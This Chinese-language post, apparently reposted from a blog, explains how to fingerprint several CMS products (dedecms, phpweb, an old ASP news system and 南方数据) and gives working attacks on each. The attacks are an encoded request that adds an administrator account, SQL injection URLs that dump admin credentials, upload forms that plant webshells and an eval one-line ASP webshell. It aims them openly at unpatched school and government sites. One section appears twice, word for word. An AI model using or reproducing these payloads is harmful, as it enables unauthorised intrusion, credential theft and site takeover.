经常看到群里面有问一些CMS系统的特征问题,比如截个后台图问是什么程序之类的,小菜特意整理了一下见过的一些特征明显的CMS系统。附一些漏洞利用,还望大牛勿喷。
一.dedecms(织梦)
1.后台
有时候有的会改后台,但是有个验证码的特征,就是验证码的背景是横线和右斜线的格子图。
这样的基本可以确定是dedecms
2.漏洞利用
a.可以直接试试工具包里面的漏洞利用工具。附下载 
dedecms5.7.rar (1.64 MB, 下载次数: 23)
b.手工测试一下是否存在/plus/download.php。有时候有的管理员会改download.php的名字,这个时候可以试试plus是否可以遍历。如果存在/plus/download.php的话,可以带入执行以下参数。
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
自动添加管理员spider密码admin
二.phpweb
1.后台
这个是没有修改过的phpweb后台。后台登陆地址一般是/admin.php
2.前台
如图,在打开一个文章的时候,静态页面文件名前面有一个问号的。一般就是phpweb了。
3.漏洞利用
http://localhost /down/class/index.php?myord=’注入得到管理员账户
登陆后台,用以下代码传个大马得到webshell
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://localhost/kedit/upload_cgi/upload.php”>
<input type=”hidden” name=”fileName” id=”fileName” value=”tem1p_jm.PHP;.jpg” />
<input type=”hidden” name=”attachPath” id=”fileName” value=”news/pics/” />
<select id=”imageType” onchange=”javascript:parent.KindImageType(this.value);document.getElementById(‘KE_IMAGEsubmitButton’).focus();”>
<option value=”1″ selected=”selected”>本地</option>
<option value=”2″>远程</option>
</select>
<input type=”text” id=”imgLink” value=”http://” maxlength=”255″ style=”width:95%;border:1px solid #555555;display:none;” />
<input type=”file” name=”fileData” id=”imgFile” size=”14″ style=”border:1px solid #555555;” onclick=”javascript:document.getElementById(‘imgLink’).value=’http://’;” /></td>
<input type=”text” name=”imgTitle” id=”imgTitle” value=”” maxlength=”100″ style=”width:95%;border:1px solid #555555;” />
<input type=”text” name=”imgWidth” id=”imgWidth” value=”0″ maxlength=”4″ style=”width:40px;border:1px solid #555555;” />
<input type=”text” name=”imgHeight” id=”imgHeight” value=”0″ maxlength=”4″ style=”width:40px;border:1px solid #555555;” />
<input type=”text” name=”imgBorder” id=”imgBorder” value=”0″ maxlength=”1″ style=”width:20px;border:1px solid #555555;” />
<select id=”imgAlign” name=”imgAlign”>
<option value=””>对齐方式</option>
<option value=”baseline”>baseline</option>
<option value=”top”>top</option>
<option value=”middle”>middle</option>
<option value=”bottom”>bottom</option>
<option value=”texttop”>texttop</option>
<option value=”absmiddle”>absmiddle</option>
<option value=”absbottom”>absbottom</option>
<option value=”left”>left</option>
<option value=”right”>right</option>
</select>
<input type=”text” name=”imgHspace” id=”imgHspace” value=”0″ maxlength=”1″ style=”width:20px;border:1px solid #555555;” />
<input type=”text” name=”imgVspace” id=”imgVspace” value=”0″ maxlength=”1″ style=”width:20px;border:1px solid #555555;” />
<input type=”submit” name=”button” id=”KE_IMAGEsubmitButton” value=”确定” style=”border:1px solid #555555;background-color:#AAAAAA;” /></form>
三.想起一个很老的asp程序
沸腾3AS流浪尘缘新闻系统(核心:尘缘雅境图文系统)
一些学校或者政府机构的分站喜欢用的系统
1.后台
2.基本上现在还用这个系统的机构是不知道什么叫补丁的。所以直接exp利用。
附下载
尘缘雅境.rar (56.54 KB, 下载次数: 9)
四.南方数据程序系统漏洞
1.特征。
a. inurl:HomeMarket.asp 这个大家都懂得
b.同时存在contact.asp、conews.asp、comphonor.asp。这样的就几乎可以肯定是南方数据的了。
2.漏洞利用
a.注入得到用户名密码。
NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’
附图: 
b. 注入得到用户名密码2。
news_search.asp?key=7%’ union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or ‘%’=’&otype=title&Submit=%CB%D1%CB%F7
附图: 
c. 通过upfile_other.asp漏洞文件获取SHELL
打开userreg.asp进行注册,登录,然后使用一下代码上传:
<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee}
.tx1 {BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px}
</STYLE><META content=”MSHTML 6.00.2800.1400″ name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action=”http://localhost/upfile_Other.asp”; method=post
encType=multipart/form-data><INPUT type=file size=30 name=FileName> <INPUT type=file size=30 name=FileName1> <INPUT xxxxx=”BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal” type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
老规矩,改一下action。
第一个选项选择图片文件,第二个选项选择.cer、.asa或asp文件上传。
d. 管理员登陆之后在admin/SiteConfig.asp的版权信息里写入”%><%eval(request(chr(97)))%><%’
就可以把shell写入inc/config.asp chr(97)=a
然后直接菜刀inc/config.asp
e.有些情况后台会找不到,这样的话可以直接查看主页的源代码,然后会看到以下信息。
这样就可以确定后台地址了。然后直接用爆出来的管理登录。SHELL到手。
四.南方数据程序系统漏洞
1.特征。
a. inurl:HomeMarket.asp 这个大家都懂得
b.同时存在contact.asp、conews.asp、comphonor.asp。这样的就几乎可以肯定是南方数据的了。
2.漏洞利用
a.注入得到用户名密码。
NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’
附图: 
b. 注入得到用户名密码2。
news_search.asp?key=7%’ union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or ‘%’=’&otype=title&Submit=%CB%D1%CB%F7
附图: 
c. 通过upfile_other.asp漏洞文件获取SHELL
打开userreg.asp进行注册,登录,然后使用一下代码上传:
<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee}
.tx1 {BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px}
</STYLE><META content=”MSHTML 6.00.2800.1400″ name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action=”http://localhost/upfile_Other.asp”; method=post
encType=multipart/form-data><INPUT type=file size=30 name=FileName> <INPUT type=file size=30 name=FileName1> <INPUT xxxxx=”BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal” type=submit value=上传 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
老规矩,改一下action。
第一个选项选择图片文件,第二个选项选择.cer、.asa或asp文件上传。
d. 管理员登陆之后在admin/SiteConfig.asp的版权信息里写入”%><%eval(request(chr(97)))%><%’
就可以把shell写入inc/config.asp chr(97)=a
然后直接菜刀inc/config.asp
e.有些情况后台会找不到,这样的话可以直接查看主页的源代码,然后会看到以下信息。
这样就可以确定后台地址了。然后直接用爆出来的管理登录。SHELL到手。
转载请注明:jinglingshu的博客 » 关于一些常见CMS的总结